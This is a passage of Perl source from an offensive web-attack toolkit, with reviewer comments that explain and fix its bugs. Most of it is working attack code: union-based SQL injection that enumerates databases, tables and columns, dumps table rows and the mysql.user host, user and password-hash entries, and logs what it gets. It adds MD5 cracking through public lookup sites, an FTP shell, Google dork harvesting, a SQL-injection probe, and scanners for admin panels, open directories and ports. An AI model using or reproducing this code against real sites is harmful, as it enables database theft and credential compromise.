    $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
    $injection = $start.$concat.$end.$pass2;
    $code = toma($injection);
    if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
    print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
    savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
    } else {
    print "\n[-] Not found any data\n";
    }}}


    # Per-target sub-menu: $_[0] is the working query, $_[1] the separator
    # style, and $save (the URL authority) names the log file. Reads one line
    # and dispatches on unanchored regexes.
    # Review notes: every branch ends in "&reload", which calls this sub again
    # with only $_[0], so the separator style in $_[1] is lost after the first
    # command and falls back to bypass()'s default; the menu never returns, so
    # each command nests one level deeper; "help" is handled by the first if
    # and then still reaches the else branch; "exit" uses "next" with no loop
    # in this sub; the "logs" branch builds a single-string system() call from
    # $save, which comes from the target URL.
    sub menu_options {

    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    print "\n/logs/webs/$save>";
    chomp (my $rta = <stdin>);

    if ($rta=~/help/) {
    print qq(

    commands : details tables columns dbs othertable othercolumn
              mysqluser dumper logs exit

    );
    }


    if ($rta =~/tables/) {
    schematables($_[0],$_[1],$save);
    &reload;
    }
    elsif ($rta =~/columns (.*)/) {
    my $tabla = $1;
    schemacolumns($_[0],$_[1],$save,$tabla);
    &reload;
    }
    elsif ($rta =~/dbs/) {
    &schemadb($_[0],$_[1],$save);
    &reload;
    }
    elsif ($rta =~/othertable (.*)/) {
    my $data = $1;
    &schematablesdb($_[0],$_[1],$data,$save);
    &reload;
    }
    elsif ($rta =~/othercolumn (.*) (.*)/){
    my ($db,$table) = ($1,$2);
    &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
    &reload;
    }
    elsif ($rta =~/mysqluser/) {
    &mysqluser($_[0],$_[1],$save);
    &reload;
    }
    elsif ($rta=~/logs/) {
    $t = "logs/webs/$save.txt";
    system("start $t");
    &reload;
    }
    elsif ($rta=~/exit/) {
    next;
    }

    elsif ($rta=~/dumper (.*) (.*) (.*)/) {
    my ($tabla,$col1,$col2) = ($1,$2,$3);
    &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
    &reload;
    }
    elsif ($rta =~/details/) {
    &details($_[0],$_[1],$save);
    &reload;
    }
    else {
    &reload;
    }
    }



    # "tables" command: counts rows of information_schema.tables, then fetches
    # table_name one row at a time with LIMIT n,1 and logs each to <$save>.txt.
    # Review notes: the count is reduced by 17 and the loop starts at offset 17
    # (presumably to skip information_schema's own entries - confirm); $real,
    # $total, $code and $code1 are package globals; "my $limit = $1" is then
    # shadowed by the loop variable of the same name; the count comes from $1
    # of the first RATSXPDOWN1 match, which is greedy.
    sub schematables {
    $real = "1";
    my ($page,$bypass,$save) = @_;
    savefile($save.".txt","\n");
    print "\n";
    my $page1 = $page;
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($save.".txt","[DB] : default");
    print "\n[+] Searching tables with schema\n\n";
    $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $resto = $1;
    $total = $resto - 17;
    print "[+] Tables Length :  $total\n\n";
    savefile($save.".txt","[+] Searching tables with schema\n");
    savefile($save.".txt","[+] Tables Length :  $total\n");
    my $limit = $1;
    for my $limit(17..$limit) {
    $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $table = $1;
    chomp $table;
    print "[Table $real Found : $table ]\n";
    savefile($save.".txt","[Table $real Found : $table ]");
    $real++;
    }}
    print "\n";
    } else {
    print "\n[-] information_schema = ERROR\n";
    }
    }

    # Re-enters the target menu. It is always invoked as "&reload;" (no parens),
    # which hands it the caller's @_, but it forwards only $_[0]: the separator
    # style in $_[1] is dropped, and every call nests another menu_options()
    # frame - nothing ever returns to the previous one.
    sub reload {
    &menu_options($_[0]);
    }


    # "columns <table>" command: counts and then lists column_name for $table
    # in information_schema.columns, one row per request, logging each line.
    # Review notes: the loop runs 0..$si INCLUSIVE, i.e. one request past the
    # reported count (the extra one simply does not match); $real, $code3 and
    # $code4 are package globals; $table is encoded with ascii() into a char()
    # list rather than quoted.
    sub schemacolumns {
    my ($page,$bypass,$save,$table) = @_;
    my $page3 = $page;
    my $page4 = $page;
    savefile($save.".txt","\n");
    print "\n";
    ($pass1,$pass2) = &bypass($bypass);
    print "\n[DB] : default\n";
    savefile($save.".txt","[DB] : default");
    savefile($save.".txt","[Table] : $table\n");
    $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
    if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[Columns Length : $1 ]\n\n";
    savefile($save.".txt","[Columns Length : $1 ]\n");
    my $si = $1;
    chomp $si;
    $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit2(0..$si) {
    $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "[Column $real] : $1\n";
    savefile($save.".txt","[Column $real] : $1");
    $real++;
    }}
    print "\n";
    } else {
    print "\n[-] information_schema = ERROR\n";
    }}

    # "dbs" command: counts and lists schema_name from information_schema.schemata,
    # skipping the three names filtered on the "ne" line, logging the rest.
    # Review notes: the count query on the first toma() line omits the trailing
    # $pass2 token that every other query in this file appends - likely an
    # oversight; the loop runs 0..$limita inclusive (one request past the
    # count); $real and $code are package globals and $code is reused inside
    # the loop.
    sub schemadb {
    my ($page,$bypass,$save) = @_;
    my $page1 = $page;
    savefile($save.".txt","\n");
    print "\n\n[+] Searching DBS\n\n";
    ($pass1,$pass2) = &bypass($bypass);
    $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $limita = $1;
    print "[+] Databases Length : $limita\n\n";
    savefile($save.".txt","[+] Databases Length : $limita\n");
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit(0..$limita) {
    $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $control = $1;
    if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
    print "[Database $real Found] $control\n";
    savefile($save.".txt","[Database $real Found] : $control");
    $real++;
    }
    }
    }
    print "\n";
    } else {
    print "[-] information_schema = ERROR\n";
    }
    }

    # "othertable <db>" command: like schematables() but restricted to
    # table_schema = $db and without the 17-row skip. Arguments are
    # ($page, $bypass, $db, $save); $_[1] and $_[3] are used positionally.
    # Review notes: the loop runs 0..$limit inclusive (one request past the
    # count); $real, $code and $code1 are package globals; the two commented
    # print lines would echo the full request to the console.
    sub schematablesdb {
    my $page = $_[0];
    my $db = $_[2];
    my $page1 = $page;
    savefile($_[3].".txt","\n");
    print "\n\n[+] Searching tables with DB $db\n\n";
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($_[3].".txt","[DB] : $db");
    $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
    #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
    print "[+] Tables Length :  $1\n\n";
    savefile($_[3].".txt","[+] Tables Length :  $1\n");
    my $limit = $1;
    $real = "1";
    for my $lim(0..$limit) {
    $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
    #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
    if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $table = $1;
    chomp $table;
    savefile($_[3].".txt","[Table $real Found : $table ]");
    print "[Table $real Found : $table ]\n";
    $real++;
    }}
    print "\n";
    } else {
    print "\n[-] information_schema = ERROR\n";
    }}

    # "othercolumn <db> <table>" command: like schemacolumns() but also
    # restricted to table_schema = $db.
    # Review notes: $bypass is unpacked but bypass() is called with $_[1] (same
    # value); the loop runs 0..$si inclusive (one request past the count);
    # $real, $code3 and $code4 are package globals.
    sub schemacolumnsdb {
    my ($page,$bypass,$db,$table,$save) = @_;
    my $page3 = $page;
    my $page4 = $page;
    print "\n\n[+] Searching columns in table $table with DB $db\n\n";
    savefile($save.".txt","\n");
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($save.".txt","\n[DB] : $db");
    savefile($save.".txt","[Table] : $table");
    $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
    if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[Columns length : $1 ]\n\n";
    savefile($save.".txt","[Columns length : $1 ]\n");
    my $si = $1;
    chomp $si;
    $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit2(0..$si) {
    $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "[Column $real] : $1\n";
    savefile($save.".txt","[Column $real] : $1");
    $real++;
    }
    }
    } else {
    print "\n[-] information_schema = ERROR\n";
    }
    print "\n";
    }

    # "mysqluser" command: checks that mysql.user is readable, counts its rows
    # and then reads Host/User/Password one row per request, logging each.
    # Review notes: the loop bound uses $1 from the count match; the "hackman"
    # substitution on $cop inside the loop only changes anything on the first
    # pass (the placeholder is gone afterwards); a row that fails to match calls
    # &reload from inside the loop, nesting a new menu instead of finishing;
    # $code and $code1 are package globals and $code is reused in the loop;
    # the 0x52415453... hex literals are the same RATSXPDOWN marker as the
    # char() lists elsewhere.
    sub mysqluser {
    my ($page,$bypass,$save) = @_;
    my $cop = $page;
    my $cop1 = $page;
    savefile($save.".txt","\n");
    print "\n\n[+] Finding mysql.users\n";
    ($pass1,$pass2) = &bypass($bypass);
    $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
    $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
    if ($code=~/RATSXPDOWN/ig){
    $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
    if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[+] Users Found : $1\n\n";
    savefile($save.".txt","\n[+] Users mysql Found : $1\n");
    for my $limit(0..$1) {
    $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
    $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
    print "[Host] : $1 [User] : $2 [Password] : $3\n";
    savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
    } else {
    print "\n";
    &reload;
    }
    }
    }
    } else {
    print "\n[-] mysql.user = ERROR\n\n";
    }
    }

    # Dump two columns of a table through the injection point.
    # Positional arguments: $_[0] injection URL with the "hackman"
    # placeholder, $_[1] first column, $_[2] second column, $_[3] table,
    # $_[4] comment style for bypass(), $_[5] log file stem.
    # The marker char(69,82,84,79,82,56,53,52) spells "ERTOR854" and
    # brackets each extracted value.  Column and table names are spliced
    # into the query verbatim (they are the operator's own input here).
    # NOTE(review): uses the package globals $pass1, $pass2, $concatx,
    # $concat, $val_code, $tota and $injection; toma(), savefile() and
    # reload() live elsewhere in the file.
    sub dump {
    savefile($_[5].".txt","\n");
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[4]);
    if ($page=~/(.*)hackman(.*)/){
    my $start = $1;
    my $end = $2;
    print "\n\n[+] Extracting values...\n\n";
    # Row count first, then the two-column payload used per row.
    $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
    $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
    $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
    if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
    $tota = $1;
    print "[+] Table : $_[3]\n";
    print "[+] Length of the rows : $tota\n\n";
    print "[$_[1]] [$_[2]]\n\n";
    savefile($_[5].".txt","[Table] : $_[3]");
    savefile($_[5].".txt","[+] Length of the rows: $tota\n");
    savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
    # 0..count requests one row past the end; that miss reaches the else
    # branch, which reports completion and calls reload().
    for my $limit(0..$tota) {
    chomp $limit;
    $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
    savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
    print "[$_[1]] : $1   [$_[2]] : $2\n";
    } else {
    print "\n\n[+] Extracting Finish\n\n";
    &reload;
    }
    }
    } else {
    print "[-] Not Found any DATA\n\n";
    }}}

    # Translate the comment-style option into the (separator, terminator)
    # pair spliced into every injected query: "/*" -> "/**/" and "/*",
    # "%20" -> "%20" and "%00", anything else -> "+" and "--".
    sub bypass {
        my ($style) = @_;
        return ("/**/", "/*") if $style eq "/*";
        return ("%20", "%00") if $style eq "%20";
        return ("+", "--");
    }

    # Render a string as a comma-separated list of code points, the form
    # MySQL's char() accepts (e.g. "ab" -> "97,98").
    sub ascii {
        my ($text) = @_;
        my @codes = unpack("U*", $text);
        return join(",", @codes);
    }

    # Base64-encode the argument and drop the trailing newline that
    # encode_base64() appends.
    sub base {
        chomp(my $encoded = encode_base64(shift));
        return $encoded;
    }

    # Base64-decode the argument; a single trailing newline in the decoded
    # text is removed (chomp), as in the original.
    sub base_de {
        chomp(my $plain = decode_base64(shift));
        return $plain;
    }


    # Mirror $url into the local file $dest with the shared LWP client and
    # report success only if the file exists afterwards.
    # NOTE(review): the bareword "true" is the string 'true' unless a
    # constant of that name is declared elsewhere; callers only test truth.
    sub download {
        my ($url, $dest) = @_;
        my $response = $nave->mirror($url, $dest);
        if ($response and -f $dest) {
            return true;
        }
    }


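    # Encode a string as a MySQL hex literal, e.g. "ab" -> "0x6162".
    # Fix: each byte is now zero-padded to two digits ("%02x"); the original
    # "%x" emitted a single digit for bytes below 0x10, which the pair-wise
    # decoder hex_de() then mis-read.  Code points above 0xff still widen to
    # more than two digits.
    sub hex_en {
        my ($string) = @_;
        my $hex = '0x';
        for my $char (split //, $string) {
            $hex .= sprintf "%02x", ord $char;
        }
        return $hex;
    }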

    # Decode a hex literal back to a string: an optional "0x" prefix is
    # dropped and every two-digit pair becomes one character.  A dangling
    # odd digit is ignored.
    sub hex_de {
        my ($text) = @_;
        $text =~ s/^0x//;
        my @pairs = $text =~ /../g;
        return join '', map { chr hex $_ } @pairs;
    }

    # Inverse of ascii(): turn "97,98" back into "ab".
    sub ascii_de {
        my ($csv) = @_;
        my @chars = map { chr $_ } split /,/, $csv;
        return join '', @chars;
    }

    # Enumerate running processes through WMI (Win32::OLE, Windows only)
    # and return a hash of process caption => PID.  Captions are not unique,
    # so several processes with the same name collapse to a single entry
    # (whichever was enumerated last).
    # NOTE(review): `in` is the Win32::OLE collection iterator; the OLE
    # calls are not error-checked, so a failed ConnectServer() dies on the
    # InstancesOf() call.
    sub getprocess {

    my %procesos;

    my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
    my $dos = $uno->ConnectServer("","root\\cimv2");

    foreach my $pro (in $dos->InstancesOf("Win32_Process")){
    $procesos{$pro->{Caption}} = $pro->{ProcessId};
    }
    return %procesos;
    }

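    # Terminate process $pid with exit code $numb via Win32::Process::KillProcess.
    # Returns 1 on success and 0 on failure.
    # Fix: the original returned the barewords true/false, i.e. the strings
    # 'true' and 'false' (unless constants of those names exist elsewhere),
    # and the string 'false' is TRUE in Perl, so callers could never detect a
    # failed kill.
    sub killprocess {
        my ($numb, $pid) = @_;
        return Win32::Process::KillProcess($pid, $numb) ? 1 : 0;
    }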

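    # Resolve a host name to its dotted-quad IPv4 address.
    # Returns undef (empty list in list context) when the name does not
    # resolve; the original passed gethostbyname's undef straight into
    # inet_ntoa(), which dies with "Bad arg length".
    sub getip {
        my ($host) = @_;
        my $packed = gethostbyname($host);
        return unless defined $packed;
        return inet_ntoa($packed);
    }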

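    # Look an MD5 hash up against several public reverse-lookup sites and
    # append every cleartext found to logs/pass-found.txt as "hash:plain".
    # Argument: the hash to look up.
    # NOTE(review): this ships the hash to third-party web services; do not
    # feed it hashes you are not allowed to disclose.
    # Fixes against the original lookup table:
    #  - 'variables' held a single-quoted *string* ('{"..." => $_[0], ...}')
    #    that tomar() then dereferenced as a hash name, so every POST went
    #    out with an empty form; the entries are real hash references now.
    #  - the single-quoted 'regex' entries kept a literal "$_[0]"; since a
    #    pattern is interpolated only once, that text reached the regex
    #    engine as syntax and could not match.  The hash is interpolated here.
    #  - the POST branch never printed a hit, unlike the GET branch.
    # Sites are queried in sorted order so output is reproducible.
    sub crackit {
        my ($secret) = @_;

        print "[+] Cracking $secret\n\n";

        my %hash = (
            'http://passcracking.com/' => {
                'tipo'      => 'post',
                'variables' => { "datafromuser" => $secret, "submit" => "DoIT" },
                'regex'     => qq(<\/td><td>md5 Database<\/td><td>$secret<\/td><td bgcolor=#FF0000>(.*)<\/td><td>),
            },
            'http://md5.hashcracking.com/search.php?md5=' => {
                'tipo'  => 'get',
                'regex' => qq(Cleartext of $secret is (.*)),
            },
            'http://www.bigtrapeze.com/md5/' => {
                'tipo'      => 'post',
                'variables' => { "query" => $secret, "submit" => " Crack " },
                'regex'     => qq(The hash <strong>$secret<\/strong> has been deciphered to: <strong>(.+)<\/strong>),
            },
            'http://opencrack.hashkiller.com/' => {
                'tipo'      => 'post',
                'variables' => { "oc_check_md5" => $secret, "submit" => "Search MD5" },
                'regex'     => qq(<\/div><div class="result">$secret:(.+)<br\/>),
            },
            'http://www.hashchecker.com/index.php?_sls=search_hash' => {
                'tipo'      => 'post',
                'variables' => { "search_field" => $secret, "Submit" => "search" },
                'regex'     => qq(<td><li>Your md5 hash is :<br><li>$secret is <b>(.*)<\/b> used charl),
            },
            'http://victorov.su/md5/?md5e=&md5d=' => {
                'tipo'  => 'get',
                'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
            },
        );

        for my $site (sort keys %hash) {
            my $entry = $hash{$site};
            my $code;
            if ($entry->{tipo} eq "get") {
                # GET services take the hash appended to the URL.
                $code = toma($site . $secret);
            } else {
                $code = tomar($site, $entry->{variables});
            }
            if ($code =~ /$entry->{regex}/i) {
                print "\n[+] Decoded : " . $1 . "\n\n";
                saveyes("logs/pass-found.txt", $secret . ":" . $1);
            }
        }
        print "\n[+] Finish\n";
    }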

    # Interactive FTP shell: connect to $ftp, log in as $user/$pass and then
    # read commands from STDIN until "exit" or "quit".
    # NOTE(review): every command is matched with an unanchored /.../ig, so
    # one input line can satisfy several handlers (e.g. "rmdir x" also
    # matches /dir/ and lists the directory), and "exit"/"quit" leave via
    # `next`, which unwinds out of this sub into the caller's loop
    # ("Exiting subroutine via next").  The credentials arrive as plain
    # command-line words (see helpme) and FTP itself is cleartext.
    sub ftp {

    my ($ftp,$user,$pass) = @_;

    if (my $socket = Net::FTP->new($ftp)) {
    if ($socket->login($user,$pass)) {

    print "\n[+] Enter of the server FTP\n\n";

    # Command loop implemented with a label and `goto menu` at the bottom.
    menu:

    print "\n\nftp>";
    chomp (my $cmd = <stdin>);
    print "\n\n";

    if ($cmd=~/help/) {
    print q(

    help : show information
    cd : change directory <dir>
    dir : list a directory
    mdkdir : create a directory <dir>
    rmdir : delete a directory <dir>
    pwd : directory  
    del : delete a file <file>
    rename : change name of the a file <file1> <file2>
    size : size of the a file <file>
    put : upload a file <file>
    get : download a file <file>
    cdup : change dir <dir>
    exit : ??


    );
    }

    # Unanchored: also fires for "mkdir ..." and "rmdir ...".
    if ($cmd=~/dir/ig) {
    if (my @files = $socket->dir()) {
    for(@files) {
    print "[+] ".$_."\n";
    }
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/pwd/ig) {
    print "[+] Path : ".$socket->pwd()."\n";
    }

    if ($cmd=~/cd (.*)/ig) {
    if ($socket->cwd($1)) {
    print "[+] Directory changed\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/cdup/ig) {
    if (my $dir = $socket->cdup()) {
    print "\n\n[+] Directory changed\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/del (.*)/ig) {
    if ($socket->delete($1)) {
    print "[+] File deleted\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    # Greedy captures: "rename a b c" becomes ("a b", "c").
    if ($cmd=~/rename (.*) (.*)/ig) {
    if ($socket->rename($1,$2)) {
    print "[+] File Updated\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/mkdir (.*)/ig) {
    if ($socket->mkdir($1)) {
    print "\n\n[+] Directory created\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/rmdir (.*)/ig) {
    if ($socket->rmdir($1)) {
    print "\n\n[+] Directory deleted\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    # `next` here leaves the sub (and the FTP session is never quit cleanly).
    if ($cmd=~/exit/ig) {
    next;
    }

    # get <remote> <local>
    if ($cmd=~/get (.*) (.*)/ig) {
    print "\n\n[+] Downloading file\n\n";
    if ($socket->get($1,$2)) {
    print "[+] Download completed";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    # put <local> <remote>
    if ($cmd=~/put (.*) (.*)/ig) {
    print "\n\n[+] Uploading file\n\n";
    if ($socket->put($1,$2)) {
    print "[+] Upload completed";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/quit/) {
    next;
    }

    goto menu;

    } else {
    print "\n[-] Failed the login\n\n";
    }

    } else {
    print "\n\n[-] Error\n\n";
    }



    }


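    # Crawl the links found on $_[0]; for every link that is relative or
    # points back at the same host, request the link's parent directory and
    # report the ones that answer with a directory listing ("Index Of"),
    # appending them to logs/paths-found.txt.
    # Fix: the host ($auth) and the file name were interpolated into
    # patterns unescaped, so "." in a host matched any character and an
    # empty host hit Perl's empty-pattern rule (re-use of the last
    # successful regex).  Both are now quoted with \Q...\E and the empty
    # case is short-circuited.
    # Depends on repes(), get_links(), toma(), saveyes() and uri_split()
    # (URI::Split) from elsewhere in the file.
    sub scanpaths {
        my ($urla) = @_;

        print "\n[+] Find paths in $urla\n\n\n";
        my @urls = repes(get_links(toma($urla)));
        for my $url (@urls) {
            my ($scheme, $auth, $path, $query, $frag) = uri_split($url);
            my $host = defined $auth ? $auth : "";
            # Only follow links that are relative or that name the scanned host.
            next unless $host eq "" or $urla =~ /\Q$host\E/;
            next unless defined $path and $path =~ /(.*)\/(.*)\.(.*)$/;
            my $file = "$2.$3";
            next unless $url =~ /(.*)\Q$file\E/;
            my $dir = $1;
            # A relative directory is resolved against the page we started from.
            unless ($host ne "" and $dir =~ /\Q$host\E/) {
                $dir = $urla . $dir;
            }
            my $body = toma($dir);
            if ($body =~ /Index Of/i) {
                print "[Link] : " . $dir . "\n";
                saveyes("logs/paths-found.txt", $dir);
            }
        }
        print "\n\n[+] Finish\n";
    }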


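    # Connect-scan a fixed list of common TCP ports on $_[0] and print the
    # ones that accept a connection within 0.5 s.
    # Fixes: ports are visited in numeric order instead of hash order (the
    # original output order was nondeterministic), the indirect-object
    # `new IO::Socket::INET(...)` is replaced by an explicit class-method
    # call, and each probe socket is closed explicitly.
    sub scanport {
        my ($host) = @_;

        my %ports = (
            "21"   => "ftp",
            "22"   => "ssh",
            "25"   => "smtp",
            "80"   => "http",
            "110"  => "pop3",
            "3306" => "mysql",
        );

        print "[+] Scanning $host\n\n\n";

        for my $port (sort { $a <=> $b } keys %ports) {
            my $sock = IO::Socket::INET->new(
                PeerAddr => $host,
                PeerPort => $port,
                Proto    => "tcp",
                Timeout  => 0.5,
            );
            next unless $sock;
            print "[Port] : " . $port . " [Service] : " . $ports{$port} . "\n";
            close $sock;
        }
        print "\n\n[+] Finish\n";
    }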


    # Try every admin-panel path in @panels under the base URL $_[0] and
    # print/log the ones that answer with an HTTP success status.
    # NOTE(review): is_success() alone is the criterion, so a site that
    # serves a custom "not found" page with status 200 reports every path.
    sub scanpanel {
        my ($base) = @_;
        print "[+] Scanning $base\n\n\n";
        for my $candidate (@panels) {
            my $target = $base . "/" . $candidate;
            my $resp = tomax($target);
            next unless $resp->is_success;
            print "[Link] : " . $target . "\n";
            saveyes("logs/panel-logs.txt", $target);
        }
        print "\n\n[+] Finish\n";
    }

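    # Query Google for $dork over result pages start=10,20,...,$pages and
    # return the de-duplicated target URLs recovered from the
    # "webcache.googleusercontent.com/...cache:ID:URL+..." links.
    # Fix: results were collected in package globals (@url, @founds) that
    # were never cleared, so a second call returned the previous call's
    # hits as well; they are lexical now.  $a/$b were also used as
    # parameter names, which clobbers sort()'s package variables.
    # NOTE(review): $dork is not URL-encoded and the first result page
    # (start=0) is skipped; both are kept as in the original.
    sub google {
        my ($dork, $pages) = @_;
        my @cache_links;
        for (my $start = 10; $start <= $pages; $start += 10) {
            my $html = toma("http://www.google.com.ar/search?hl=&q=" . $dork . "&start=$start");
            push @cache_links, grep { /webcache\.googleusercontent\.com/ } get_links($html);
        }

        my @targets;
        for my $link (@cache_links) {
            push @targets, $2 if $link =~ /cache:(.*?):(.*?)\+/;
        }

        return repes(@targets);
    }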


    # Quick SQL-injection probe: append "-1 union select 666--" to the URL
    # and treat MySQL's column-count error as a hit, which is printed (with
    # a bell) and appended to logs/sql-logs.txt.
    sub sql {
        my ($page) = @_;
        my ($sep, $term) = ("+", "--");
        my $probe = $page . "-1" . $sep . "union" . $sep . "select" . $sep . "666" . $term;
        my $body = toma($probe);
        return unless $body =~ /The used SELECT statements have a different number of columns/i;
        print "[+] SQLI : $page\a\n";
        saveyes("logs/sql-logs.txt", $page);
    }

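    # Extract every link-bearing attribute value (href, src, ...) from an
    # HTML document and return them as a list.
    # Fix: the collector array @links was never cleared, so each call
    # returned the links of all previous calls too.  It is reset on entry
    # and a copy is returned; agarrar() keeps its role as the
    # HTML::LinkExtor callback but is no longer nested in this sub.
    sub get_links {
        my ($html) = @_;
        @links = ();
        HTML::LinkExtor->new(\&agarrar)->parse($html);
        my @found = @links;
        return @found;
    }

    # HTML::LinkExtor callback: receives (tag, attr => value, ...) and keeps
    # every value.
    sub agarrar {
        my ($tag, %attr) = @_;
        push @links, values %attr;
    }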

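    # Return the arguments with duplicates removed, first occurrence kept,
    # order preserved.
    # Fix: the original kept @limpio and %repe as package globals that were
    # never reset, so every call also returned the items of all earlier
    # calls (and dropped anything seen before).  Both are lexical now.
    sub repes {
        my %seen;
        my @unique;
        for my $item (@_) {
            push @unique, $item unless $seen{$item}++;
        }
        return @unique;
    }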

    # Print the program banner in colour (cprint escapes: code 11, then reset).
    sub head {
